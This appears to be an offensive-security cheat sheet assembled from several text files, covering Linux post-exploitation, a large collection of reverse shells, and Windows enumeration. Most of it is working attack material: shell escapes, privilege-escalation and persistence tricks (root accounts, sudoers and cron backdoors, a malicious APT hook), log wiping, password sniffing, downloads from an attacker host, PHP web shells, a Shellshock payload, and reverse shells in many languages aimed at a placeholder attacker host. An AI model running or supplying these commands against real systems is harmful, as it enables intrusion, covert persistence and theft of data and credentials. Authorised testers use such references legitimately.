~$ find . -xdev -type f -user root -perm -o+w -exec ls -lahd {} \; 2>/dev/null
`` World-readable files owned by root at /root
~$ find /root -xdev -type f -user root -perm -o+r -exec ls -lahd {} \; 2>/dev/null
`` World-writable and executable files in cwd
~$ find . -xdev -type f -perm -o+w,o+x ! -type l -exec ls -lahd {} \; 2>/dev/null
`` SUID and SGID root files in cwd
~$ find . -xdev -user root \( -perm -u+s -o -perm -g+s \) ! -type l -exec ls -lahd {} \; 2>/dev/null
`` Owned by current user in cwd
~$ find . -xdev -type f -user $(whoami) -exec ls -lahd {} \; 2>/dev/null
`` World-writable in cwd
~$ find . -xdev -perm -o+w ! -type l -exec ls -lahd {} \; 2>/dev/null
`` World-readable logs
~$ find /var/log -perm -o=r ! -type l -exec ls -lahd {} \; 2>/dev/null
`` World-writable dirs not owned by current user in cwd
~$ find . -type d -perm -o+w ! -perm -a+t ! -user $(whoami) -exec ls -lahd {} \; 2>/dev/null
`` Orphaned files in cwd
~$ find . -xdev -o -nouser -o -nogroup -exec ls -lahd {} \; 2>/dev/null
`` /boot permissions
~$ ls -lahd /boot
`` Capabilities
~$ getcap -r . 2>/dev/null
`` Processes
`` Monitoring
@ snippets/linux/utils/ps_monitoring.sh
`` Information
- /proc/VAR_INTEGER/cmdline
- /proc/VAR_INTEGER/environ
- /proc/VAR_INTEGER/cwd
- /proc/VAR_INTEGER/fd/[#]
`` Open ports
~$ timeout 3 bash -c "</dev/tcp/VAR_TARGET_HOST/VAR_TARGET_PORT &>/dev/null" && echo OPEN || echo CLOSED
`` Shell Escapes
`` vi
:set shell=/bin/bash:shell
:!bash
`` Perl
exec "/bin/sh";
perl -e 'exec "/bin/sh";'
`` Lua
!sh
os.execute('/bin/sh')
os.execute('cmd')
`` Ruby
exec "/bin/sh"
`` Nmap
~$ sudo nmap --interactive
nmap> !sh
`` AWK
~$ sudo awk 'BEGIN {system("/bin/bash")}'
`` find
~$ sudo find .bash_history -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
~$ sudo find .bash_history -exec /bin/bash -i \;
`` sh
~$ /bin/sh -i
`` PHP
echo os.system('/bin/bash')
`` FTP
~$ sudo ftp
! /bin/bash
! /bin/sh
`` man
~$ sudo man man
!bash
~$ man ls
!'sh'
`` less
~$ sudo less /etc/hosts
!bash
`` pinfo
~$ pinfo ls
!
`` lynx
~$ lynx --editor=/usr/bin/vim example.com
`` elinks
~$ export EDITOR=/usr/bin/vim
# Once the page opens move your cursor to the text box field, now press ENTER and then F4 keys.
`` mutt
!
`` expect
~$ expect
spawn sh
sh
`` pkexec
~$ /usr/bin/pkexec --user root /bin/sh
`` File transfer
`` nc
`` Listening for incoming transfer
~$ nc -lv4 VAR_ATTACKER_PORT | tar xzfv -
~$ tar czfv - *.log | nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT
`` Connecting to exposed port, cross-platform and OpenSSL compatible with encryption
~$ nc -lv4 VAR_TARGET_PORT -c 'tar -czf - VAR_FILENAME | openssl enc -e -aes-256-cbc -md md5'
~$ nc -v VAR_TARGET_HOST VAR_TARGET_PORT | openssl enc -d -aes-256-cbc -md md5 | tar xz
`` ncat
~$ ncat -lv --ssl VAR_ATTACKER_PORT | tar xzfv -
~$ tar czfv - *.log | ncat -v --ssl VAR_ATTACKER_HOST VAR_ATTACKER_PORT
`` bash
~$ nc -lv4 VAR_ATTACKER_PORT | base64 -d -w0 | tar xzv
~$ echo $(tar cz *.log | openssl base64 -A) 2>/dev/null > /dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT
`` /dev/tcp
~$ exec 3<>/dev/tcp/VAR_TARGET_HOST/80
~$ echo -e "GET / HTTP/1.1\r\nhost: http://VAR_TARGET_HOST\r\nConnection: close\r\n\r\n" >&3
~$ cat <&3
`` Pull external goodies and run in background
`` Goodies
# TODO: Sources + github
`` Manual execution
~$ export E_NA=pgz E_HO=http://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT; wget "$E_HO/$E_NA.x" && tar xzf $E_NA.x && cd $E_NA && chmod a+x ./*
`` Automated execution
~$ export E_NA=pgz E_HO=http://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT; wget "$E_HO/$E_NA.x" && tar xzf $E_NA.x && cd $E_NA && chmod a+x ./* && for x in "linenum.sh -t" "linuxprivchecker.py extended" "linux-suggester.pl" "suggester.sh" "unix-privesc-check detailed"; do ./$x >> "${x:0:2}${#x}".log & done
`` Privilege escalation
`` Password Bruteforcing
@ snippets/linux/utils/bruteforce.sh
`` SUID and paths
`` Check
~$ objdump -x $i | grep -i path
~$ ptrace
`` Exploiting
~$ echo "/bin/bash -i" > cat
~$ chmod +x ./cat
~$ export PATH=.:$PATH
`` SUID and function export
~$ function /usr/sbin/service() { cp /bin/bash /dev/shm && chmod +s /dev/shm/bash && /dev/shm/bash -p; }
~$ export -f /usr/sbin/service
`` SUID and LD_PRELOAD
@ snippets/linux/backdoors/ld_preload.c
~$ sudo LD_PRELOAD=ld_preload.so binary
`` SUID and .so injection
@ snippets/linux/backdoors/so_injection.c
~$ strace binary 2>&1 | grep -i -E "open|access|no such file"
`` Xorg
~$ cd /etc; Xorg -fp "toor::16431:0:99999:7:::" -logfile shadow :1;su
`` APT
/etc/apt/apt.conf.d/
APT::Update::Post-Invoke{"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT >/tmp/f";};
`` Persistence
`` Accounts
`` useradd
~$ useradd --non-unique -u 0 -g 0 -m -s /bin/bash -p $(echo 'VAR_PASSWORD' | openssl passwd -1 -stdin) VAR_USERNAME
`` /etc/passwd
~$ echo "VAR_USERNAME:`openssl passwd -6`:0:0:root:/root:/bin/bash" >> /etc/passwd
`` Add to sudoers
~$ echo "VAR_USERNAME ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
`` SSH
`` Reconnect
@ snippets/linux/backdoors/ssh_reconnect.sh
`` Overwrite
~$ debugfs -w /dev/sda1 -R "cat /root/.ssh/authorized_keys"
~$ debugfs /dev/sda1 -R "blocks /root/.ssh/authorized_keys"
~$ dd if=my_id_rsa.pub of=/dev/sda1 seek=1608806 bs=4096 count=1
~$ sync
`` Scheduling
~$ echo -e '#!/bin/bash\necho "VAR_USERNAME ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
~$ chmod +x /etc/cron.hourly/test
`` Policykit CVE-2018-19788 (pre 2018/12)
~$ systemctl --version
systemd 239
~# useradd -u 4000000000
~$ systemd-run -t /bin/bash
`` SUID
@ snippets/linux/backdoors/suid_popen.c
`` House cleaning
`` Logs
- /var/run/utmp
- /var/log/wtmp
- /var/log/btmp
- /var/log/lastlog
- /var/log/auth.log
- /var/log/secure
- /var/log/messages
- /var/log/apache2/access.log
- /var/log/apache2/error.log
- /etc/syslog.conf
`` Shredding
~$ shred -zu file
`` Search for IP
~$ grep -Rl VAR_TARGET_HOST / 2>/dev/null
`` Backdoors
`` Execute shell commands over UDP
-- Useful for injecting into shell-based cron jobs
@ snippets/linux/shells/bind/udp.sh
`` Networking
`` Bandwidth
~$ iftop -i tap0 -f "host VAR_TARGET_HOST"
~$ iptables -I INPUT 1 -s VAR_TARGET_HOST -j ACCEPT
~$ iptables -I OUTPUT 1 -d VAR_TARGET_HOST -j ACCEPT
~$ iptables -Z
~$ iptables -vn -L OUTPUT | grep VAR_TARGET_HOST
~$ iptables -Z
`` Services
~$ lsof -i -n | egrep 'COMMAND|LISTEN'
~$ netstat -ntup
~$ ss -ltup
`` Sniffing
`` Generic
~$ tcpdump -i any -vvv -XX -n -w dump.cap src not VAR_ATTACKER_HOST and (dst port 80 or dst port 443)
~$ tcpdump -i any -vvv -XX -n -w dump.cap src net VAR_TARGET_CIDR and port not 22
`` New connections only
~$ tcpdump -vvv -XX -i any "tcp[tcpflags] & (tcp-syn) != 0" and net VAR_TARGET_CIDR
`` HTTP GET and POST packets and interesting data
~$ tcpdump -i any -A -v -n -l | egrep -i "POST /|GET /|Host:|pwd=|passwd=|password=|Set-Cookie|Cookie:"
`` Plaintext passwords
~$ tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '
`` Dirtycow stability
~$ echo 0 > /proc/sys/vm/dirty_writeback_centisecs
`` Dirty tricks
`` SSH
alias ssh='ssh -o ControlMaster=yes -o ControlPath=/tmp/%r@%h:%p -o ControlPersist=yes $1'
================================================
FILE: Target.Host.OS.Shells.txt
================================================
`` Linux
@ snippets/linux/shells/
`` Windows
@ snippets/windows/shells/
`` Shell
~$ nohup /bin/bash -i >& /dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT 0>&1
~$ exec 77<>/dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT;/bin/sh <&77 >&77 2>&77
~$ exec 77<>/dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT && while read line 0<&77; do $line 2>&77 >&77; done
`` nc
`` Listener
~$ nc -klv VAR_ATTACKER_PORT
~$ ncat -klv --ssl VAR_ATTACKER_PORT
`` Shell
`` nc
~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT >/tmp/f
~$ rm /tmp/f;mkfifo /tmp/f;nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT 0</tmp/f | /bin/sh -i 2>&1 | tee /tmp/f
`` ncat
~$ ncat -e /bin/sh --ssl VAR_ATTACKER_HOST VAR_ATTACKER_PORT
`` PHP
<?php $sock=fsockopen("VAR_ATTACKER_HOST", VAR_ATTACKER_PORT); $proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
<?php passthru('/bin/sh -c "exec nohup setsid /bin/sh 0</dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT 1>&0 2>&0 &"'); ?>
<?php passthru('/bin/sh -c "exec nohup setsid /bin/sh 0</dev/tcp/'.$_POST["ip"].'/'.$_POST["port"].' 1>&0 2>&0 &"'); ?>
-- If file descriptor 3 doesn’t work, try 4, 5 or 6
<?php $sock=fsockopen("VAR_ATTACKER_HOST", VAR_ATTACKER_PORT); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
<?php passthru($_GET["cmd"]); ?>
<?php passthru($_GET["cmd"]); die(); ?>
<?php passthru('rm /tmp/.kernel;mkfifo /tmp/.kernel;cat /tmp/.kernel|/bin/sh -i 2>&1|nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT >/tmp/.kernel'); ?>
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
<?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
-- Windows
<?php @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$s=@fsockopen("tcp://VAR_ATTACKER_HOST",VAR_ATTACKER_PORT);while($c=fread($s,2048)){$out="";if(substr($c,0,3)=='cd '){chdir(substr($c,3,-1));}else if(substr($c,0,4)=="quit"||substr($c,0,4)=="exit"){break;}else{$out=shell_exec(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs);break;}}fwrite($s,$out);}fclose($s);?>
`` Python
`` GNU/Linux
~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("VAR_ATTACKER_HOST",VAR_ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
`` Windows
~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("VAR_ATTACKER_HOST",VAR_ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["%ComSpec%"]);'
`` Powershell
`` CLI
~> powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("VAR_ATTACKER_HOST",VAR_ATTACKER_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
~> powershell -nop -c "$ip='VAR_ATTACKER_HOST'; $ic = New-Object System.Net.NetworkInformation.Ping; $po = New-Object System.Net.NetworkInformation.PingOptions; $po.DontFragment = $true; $ic.Send($ip,60*1000, ([text.encoding]::ASCII).GetBytes('OK'), $po); while ($true) { $ry = $ic.Send($ip,60*1000, ([text.encoding]::ASCII).GetBytes(''), $po); if ($ry.Buffer) { $rs = ([text.encoding]::ASCII).GetString($ry.Buffer); $rt = (Invoke-Expression -Command $rs | Out-String ); $ic.Send($ip,60*1000,([text.encoding]::ASCII).GetBytes($rt),$po); } }"
`` go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","VAR_ATTACKER_HOST:VAR_ATTACKER_PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
`` telnetd
~$ /usr/sbin/telnetd -l bin/sh -p 25
`` openssl
~$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
~$ openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>
~$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -CAfile /tmp/cert.pem -verify_return_error -verify 1 -connect VAR_ATTACKER_HOST:VAR_ATTACKER_PORT > /tmp/s; rm /tmp/s
`` Java
~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=VAR_ATTACKER_HOST LPORT=VAR_ATTACKER_PORT -f war > /root/Desktop/shell.war
@ snippets/java/shells/
`` Lua
~$ lua -e "require('socket');require('os');t=socket.tcp();t:connect('VAR_ATTACKER_HOST','VAR_ATTACKER_PORT');os.execute('/bin/sh -i <&3 >&3 2>&3');"
`` Ruby
~$ ruby -rsocket -e'f=TCPSocket.open("VAR_ATTACKER_HOST",VAR_ATTACKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
`` X
`` Target
~$ xterm -display VAR_ATTACKER_HOST:1
`` Attacker
~$ Xnest :1 -listen tcp
~$ xhost +VAR_TARGET_HOST
`` telnet
~$ rm -f /tmp/p; mknod /tmp/p p && telnet VAR_ATTACKER_HOST VAR_ATTACKER_PORT 0/tmp/p
~$ telnet VAR_ATTACKER_HOST 80 | /bin/sh | telnet VAR_ATTACKER_HOST 443
`` Gawk
~$ awk 'BEGIN {s = "/inet/tcp/0/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT"; while(1) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
`` Perl
~$ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"VAR_ATTACKER_HOST:VAR_ATTACKER_PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
~$ perl -e 'use Socket;$i="VAR_ATTACKER_HOST";$p=VAR_ATTACKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
`` Minimalistic approach, useful for injecting into Perl scripts (cron jobs?)
use IO::Socket::INET; $c=new IO::Socket::INET(PeerAddr,"VAR_ATTACKER_HOST:VAR_ATTACKER_PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
`` socat
`` Bind
~$ socat TCP-LISTEN:VAR_ATTACKER_PORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
~$ socat FILE:`tty`,raw,echo=0 TCP:VAR_TARGET_HOST:VAR_ATTACKER_PORT
`` Reverse
~$ socat TCP-LISTEN:VAR_ATTACKER_PORT,reuseaddr FILE:`tty`,raw,echo=0
~$ socat TCP4:VAR_ATTACKER_HOST:VAR_ATTACKER_PORT EXEC:bash,pty,stderr,setsid,sigint,sane
`` Encrypted shell
`` Certificates
~$ openssl genrsa -out server.key 1024
~$ openssl req -new -key server.key -x509 -days 3653 -out server.crt
~$ cat server.key server.crt >server.pem
~$ chmod 600 server.key server.pem
~$ openssl genrsa -out client.key 1024
~$ openssl req -new -key client.key -x509 -days 3653 -out client.crt
~$ cat client.key client.crt >client.pem
~$ chmod 600 client.key client.pem
`` Server
~$ socat ssl-l:VAR_ATTACKER_PORT,reuseaddr,fork,cert=server.pem,cafile=client.crt,verify=1 exec:/bin/sh,pty,setsid,setpgid,stderr,ctty
`` Client
~$ socat -,raw,echo=0 ssl:VAR_ATTACKER_HOST:VAR_ATTACKER_PORT,cert=client.pem,cafile=server.crt
`` HTTP
`` Shellshock
Referer: () { :;}; /bin/sh -c "exec /bin/sh 0</dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT 1>&0 2>&0 &"
`` Node.js
`` Reverse #1
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(VAR_ATTACKER_PORT, "VAR_ATTACKER_HOST", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();
`` Reverse #2
require('child_process').exec('nc -e /bin/sh VAR_ATTACKER_HOST VAR_ATTACKER_PORT')
================================================
FILE: Target.Host.OS.Windows.txt
================================================
`` Enumeration
`` Automated
-- Easily detected by AV without patching
~> seatbelt.exe all full > report.txt
`` whoami
~> echo %USERNAME% || whoami.exe
~> wmic.exe useraccount where name='%USERNAME%' get sid
-- Verbose (whoami may trigger EDR)
~> whoami.exe /all
`` Users and Groups
~> net.exe users
~> net.exe localgroup
~> net.exe localgroup Administrators
~> net.exe localgroup "Remote Desktop Users"
-- Verbose, with SIDs
~> wmic.exe useraccount list full
`` OS
-- Basic
~> ver.exe & echo %PROCESSOR_ARCHITECTURE%
-- With systeminfo
~> systeminfo.exe | findstr.exe /B /C:"OS Name" /C:"OS Version" /C:"System Type"
-- Windows Release ID
~> reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId
-- WMI variant
~> wmic.exe os get OSArchitecture,Caption,Version
`` File-based
-- Windows XP
- C:\Windows\System32\eula.txt
-- Windows 7
- C:\Windows\System32\license.rtf
-- Windows 10
- C:\Windows\System32\license.rtf (EULA code lookup)
`` Networking
~> ipconfig.exe /all
~> arp.exe -a
-- Routing
~> route.exe print
~> netstat.exe -r
-- Listening TCP sockets
~> netstat.exe -ano -p tcp | findstr.exe LISTENING
-- Listening UDP sockets
~> netstat.exe -ano -p udp | findstr.exe LISTENING
-- Find a binary behind the specific port
~> for /f "tokens=3 delims=LISTENING" %i in ('netstat.exe -ano ^| findstr.exe "VAR_INTEGER"') do tasklist.exe /fi "pid eq %i"
~PS> netstat.exe -aon | Select-String VAR_INTEGER | ForEach-Object { $_ -replace '\s+', ',' } | ConvertFrom-Csv -Header @('Empty', 'Protocol', 'AddressLocal', 'AddressForeign', 'State', 'PID') | ForEach-Object { $portProcess = Get-Process | Where-Object Id -eq $_.PID; $_ | Add-Member -NotePropertyName 'ProcessName' -NotePropertyValue $portProcess.ProcessName; Write-Output $_ } | Sort-Object ProcessName, State, Protocol, AddressLocal, AddressForeign | Select-Object ProcessName, State, Protocol, AddressLocal, AddressForeign | Format-Table
-- Established connections
~> netstat.exe -an | findstr.exe ESTABLISHED
`` Firewall Settings
`` State
~> netsh.exe firewall show state
`` Open ports
@ snippets/windows/utils/Win10FirewallRules.ps1
`` In the Windows Network context
`` General
-- Computer name, user name, OS version and communication settings
~> net.exe config workstation
~> net.exe config server
-- Show information about all sessions with the local computer
~> net.exe session
-- Show a list of network connections
~> net.exe use
-- Show a list of computers
~> net.exe view
-- Shared resources for all domains in the network
~> net.exe view /all /domain
-- Show password and logon policy for the domain
~> net.exe accounts /domain
`` Network Shares
~> net.exe share
~> wmic.exe share list
`` Windows Server (RDP)
~> qwinsta.exe
~> quser.exe
`` SNMP
~> reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
~PS> Get-ChildItem --Path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
`` IPv6 support
~PS> Write-Host 'OS Supports IPv6: ' $( [System.Net.Sockets.Socket]::OSSupportsIPv6 )
`` PowerShell
~> reg.exe query "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
~> reg.exe query "HKLM\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine" /v PowerShellVersion
`` Check if running as 64-bit
~> [Environment]::Is64BitProcess
`` Check if running in CLM
~> $ExecutionContext.SessionState.LanguageMode
`` Startup Items
~> wmic.exe startup list brief
`` Services
~> net.exe start
~> sc.exe query state= all | findstr.exe "SERVICE_NAME DISPLAY_NAME STATE"
`` Powershell
~PS> Get-Service VAR_NAME | format-list
~PS> Get-Itemproperty HKLM:\System\CurrentControlSet\services\VAR_NAME
`` Unquoted Service Paths
~> wmic.exe service get Name,DisplayName,PathName,StartMode | findstr.exe /i /v "C:\Windows" | findstr.exe /i /v """
`` Installed software
~> dir /a "C:\Program Files" "C:\Program Files (x86)"
~> reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE
-- Verbose but takes time
~> wmic.exe product get Name,Version
-- Drivers
~> driverquery.exe
-- AV
~> wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /format:list
-- Installed Patches
~> wmic.exe qfe get Caption,Description,HotFixID,InstalledOn
-- Security mechanisms enabled?
~> reg.exe query HKLM\System\CurrentControlSet\Control\DeviceGuard
- EnableVirtualizationSecurity - Credential Guard
- RequirePlatformServices - 1 for SecureBoot
- RequirePlatformServices - 3 for Secure Boot and DMA Protection
`` Processes
~> tasklist.exe /svc
~> tasklist.exe /v /fi "username eq system"
-- Verbose
~> wmic.exe process list
`` Scheduled Tasks
~> schtasks.exe /query /fo LIST /v
~> schtasks.exe /query /fo LIST 2>nul | findstr.exe "VAR_STRING"
`` Logging
~> reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
~> reg.exe query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
~> reg.exe query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
~> reg.exe query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
~> wevutil el
`` AppLocker
~PS> (Get-AppLockerPolicy -Local).RuleCollections
~PS> Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
~> reg.exe query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
`` Interesting files
- %SYSTEMROOT%\System32\$winnt$.inf
- %SYSTEMROOT%\Panther\Unattend.xml
- %SYSTEMROOT%\Panther\Unattend\Unattend.xml
- %SYSTEMROOT%\system32\sysprep.inf
- %SYSTEMROOT%\system32\sysprep\sysprep.xml
- %SYSTEMROOT%\ntds
- %SYSTEMROOT%\System32\GroupPolicy\Machine
- %SYSTEMROOT%\System32\GroupPolicy\User
- %SYSTEMROOT%\System32\GroupPolicyUsers
- %SYSTEMDRIVE%\pagefile.sys
- %SYSTEMROOT%\debug\NetSetup.log
- %SYSTEMROOT%\iis6.log
- %SYSTEMROOT%\iis7.log
- %SYSTEMROOT%\iis8.log
- %SYSTEMROOT%\Panther\Unattend.txt
- %SYSTEMROOT%\php.ini
- %SYSTEMROOT%\repair\SAM
- %SYSTEMROOT%\repair\security
- %SYSTEMROOT%\repair\software
- %SYSTEMROOT%\repair\system
- %SYSTEMROOT%\system32\CCM\logs\*.log
- %SYSTEMROOT%\system32\config\AppEvent.Evt
- %SYSTEMROOT%\system32\config\default.sav
- %SYSTEMROOT%\system32\config\regback\default
- %SYSTEMROOT%\System32\config\RegBack\SAM
- %SYSTEMROOT%\System32\config\RegBack\system
- %SYSTEMROOT%\system32\config\regback\security
- %SYSTEMROOT%\system32\config\regback\software
- %SYSTEMROOT%\System32\config\SAM
- %SYSTEMROOT%\system32\config\SecEvent.Evt
- %SYSTEMROOT%\system32\config\security.sav
- %SYSTEMROOT%\system32\config\software.sav
- %SYSTEMROOT%\System32\config\SYSTEM
- %SYSTEMROOT%\system32\config\system.sav
- %SYSTEMROOT%\System32\drivers\etc\hosts
- %SYSTEMROOT%\System32\drivers\etc\networks
- %SYSTEMROOT%\system32\inetsrv\config\applicationHost.config
- %SYSTEMROOT%\system32\inetsrv\config\schema\ASPNET_schema.xml
- %SYSTEMROOT%\system32\logfiles\httperr\httperr1.log
- %SYSTEMROOT%\system32\sysprep
- %SYSTEMROOT%\win.ini
- %SYSTEMROOT%\windowsupdate.log
- %USERPROFILE%\ntuser.dat
- %USERPROFILE%\Application Data\Microsoft\Credentials\
- %SYSTEMDRIVE%\apache\logs\access.log
- %SYSTEMDRIVE%\apache\logs\error.log
- %SYSTEMDRIVE%\apache\php\php.ini
- %SYSTEMDRIVE%\Autounattend.xml
- %SYSTEMDRIVE%\boot.ini
- %SYSTEMDRIVE%\Documents and Settings\Administrator\desktop\desktop.ini
- %SYSTEMDRIVE%\Documents and Settings\Administrator\NTUser.dat
- %SYSTEMDRIVE%\Documents and Settings\Administrator\ntuser.ini
- %SYSTEMDRIVE%\inetpub\logs\LogFiles\
- %SYSTEMDRIVE%\inetpub\wwwroot\
- %SYSTEMDRIVE%\inetpub\wwwroot\global.asa
- %SYSTEMDRIVE%\inetpub\wwwroot\web.config
- %SYSTEMDRIVE%\MySQL\data\hostname.err
- %SYSTEMDRIVE%\MySQL\data\mysql.err
- %SYSTEMDRIVE%\MySQL\data\mysql.log
- %SYSTEMDRIVE%\MySQL\my.cnf
- %SYSTEMDRIVE%\MySQL\my.ini
- %SYSTEMDRIVE%\php4\php.ini
- %SYSTEMDRIVE%\php5\php.ini
- %SYSTEMDRIVE%\php\php.ini
- %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
- %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache\conf\access.log
- %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache\conf\error.log
- %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
- %SYSTEMDRIVE%\Program Files (x86)\FileZilla Server\FileZilla Server.xml
- %SYSTEMDRIVE%\Program Files (x86)\xampp\apache\conf\httpd.conf
- %SYSTEMDRIVE%\Program Files\Apache Group\Apache2\conf\httpd.conf
- %SYSTEMDRIVE%\Program Files\Apache Group\Apache\conf\httpd.conf
- %SYSTEMDRIVE%\Program Files\Apache Group\Apache\logs\access.log
- %SYSTEMDRIVE%\Program Files\Apache Group\Apache\logs\error.log
- %SYSTEMDRIVE%\Program Files\FileZilla Server\FileZilla Server.xml
- %SYSTEMDRIVE%\Program Files\MySQL\data\hostname.err
- %SYSTEMDRIVE%\Program Files\MySQL\data\mysql-bin.log
- %SYSTEMDRIVE%\Program Files\MySQL\data\mysql.err
- %SYSTEMDRIVE%\Program Files\MySQL\data\mysql.log
- %SYSTEMDRIVE%\Program Files\MySQL\my.cnf
- %SYSTEMDRIVE%\Program Files\MySQL\my.ini
- %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
- %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
- %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
- %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
- %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\my.cnf
- %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\my.ini
- %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.1\my.ini
- %SYSTEMDRIVE%\sysprep.inf
- %SYSTEMDRIVE%\sysprep\sysprep.inf
- %SYSTEMDRIVE%\sysprep\sysprep.xml
- %SYSTEMDRIVE%\Unattend.xml
- %SYSTEMDRIVE%\Users\Administrator\Desktop\desktop.ini
- %SYSTEMDRIVE%\Users\Administrator\NTUser.dat
